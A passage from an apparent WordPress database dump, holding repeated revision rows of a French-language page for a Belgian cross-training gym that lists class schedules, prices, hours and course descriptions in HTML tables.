5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:39:35', '2013-07-03 17:39:35', '', 11, 'http://www.crosstrainingcenter.be/?p=191', 0, 'revision', '', 0),
(192, 1, '2013-07-03 17:39:50', '2013-07-03 17:39:50', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 50%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:39:50', '2013-07-03 17:39:50', '', 11, 'http://www.crosstrainingcenter.be/?p=192', 0, 'revision', '', 0),
(193, 1, '2013-07-03 17:40:05', '2013-07-03 17:40:05', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 30%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:05', '2013-07-03 17:40:05', '', 11, 'http://www.crosstrainingcenter.be/?p=193', 0, 'revision', '', 0),
(194, 1, '2013-07-03 17:40:25', '2013-07-03 17:40:25', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 35%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:25', '2013-07-03 17:40:25', '', 11, 'http://www.crosstrainingcenter.be/?p=194', 0, 'revision', '', 0),
